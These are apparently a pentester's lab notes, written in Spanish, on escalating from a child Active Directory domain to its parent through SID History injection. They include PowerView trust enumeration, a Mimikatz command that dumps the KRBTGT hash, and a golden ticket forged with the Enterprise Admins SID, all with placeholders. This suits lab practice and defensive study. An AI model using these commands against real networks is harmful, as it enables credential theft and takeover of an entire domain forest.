Child to Parent Domain Escalation

[!danger] The SID History Attack A veces comprometes un dominio hijo (child.htb.local) y quieres ser Admin en el dominio, padre (htb.local). Requisito: Ser Domain Admin en el Child y que exista una relación de confianza.

1. Enumeration (Trusts)

Verificar si hay confianza Bidireccional o Unidireccional.

# PowerView
Get-DomainTrust
Get-DomainTrustMapping

2. The Attack (SID History Injection)

La idea es crear un Golden Ticket en el dominio Hijo, pero inyectando el SID del grupo "Enterprise Admins" del dominio Padre en el campo SIpD History.

Paso 1: Obtener SIDs

• Child KRBTGT Hash: Dumpealo (lsadump::lsa /patch).
• Child Domain SID: S-1-5-21-CHILD...
• Parent Domain SID: S-1-5-21-PARENT... (usa Get-DomainUser -Domain parent.local -Identity Administrator para verlo).

Paso 2: Forjar Ticket (Mimikatz)

El SID mágico de Enterprise Admins siempre termina en -519. Así que tomamos el SID del Padre y le pegamos -519.

# Mimikatz
kerberos::golden /user:Administrator /domain:child.htb.local /sid:<CHILD_SID> /sids:<PARENT_SID>-519 /krbtgt:<CHILD_KRBTGT_HASH> /ptt

3. Verification

Ahora tienes un ticket en memoria que dice que eres Admin del Hijo, pero con "historia" de ser Enterprise Admin.

ls \\DC-PARENT.htb.local\C$

Si lista los archivos -> PWNED.